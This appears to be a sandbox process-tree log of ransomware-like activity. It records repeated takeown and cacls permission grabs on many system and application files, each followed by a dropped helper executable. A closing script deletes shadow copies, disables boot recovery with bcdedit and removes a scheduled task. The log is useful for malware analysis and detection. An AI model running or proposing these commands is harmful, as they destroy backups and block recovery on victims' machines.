C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner3⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner4⤵PID:6132
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:6044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:6140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:5232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "background.png" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "background.png" -nobanner4⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵PID:5608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""2⤵PID:5532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C3⤵PID:5908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"3⤵
- Modifies file permissions
PID:5772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edbres00001.jrs" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "edbres00001.jrs" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:5548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:6008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:5672
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:5824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "watermark.png" -nobanner3⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "watermark.png" -nobanner4⤵PID:640
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:4132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:5640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "osver.txt" -nobanner3⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "osver.txt" -nobanner4⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:6116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:5644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:5860
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:6068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "background.png" -nobanner3⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "background.png" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:5688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:5788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:6108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wab.exe" -nobanner3⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wab.exe" -nobanner4⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:5268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:6024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵
- Modifies file permissions
PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""2⤵PID:5836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C3⤵PID:5312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"3⤵
- Modifies file permissions
PID:5888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Data1.cab" -nobanner3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Data1.cab" -nobanner4⤵PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\parse.dat""2⤵PID:5884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\parse.dat" /E /G Admin:F /C3⤵PID:5924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\parse.dat"3⤵PID:5340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "parse.dat" -nobanner3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "parse.dat" -nobanner4⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm""2⤵PID:4792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm" /E /G Admin:F /C3⤵PID:5188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm"3⤵
- Modifies file permissions
PID:4944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SmsInterceptStore.jfm" -nobanner3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SmsInterceptStore.jfm" -nobanner4⤵PID:5844
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:5408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5492
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat"1⤵PID:4904
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4984
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4420
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1008
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:2500
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032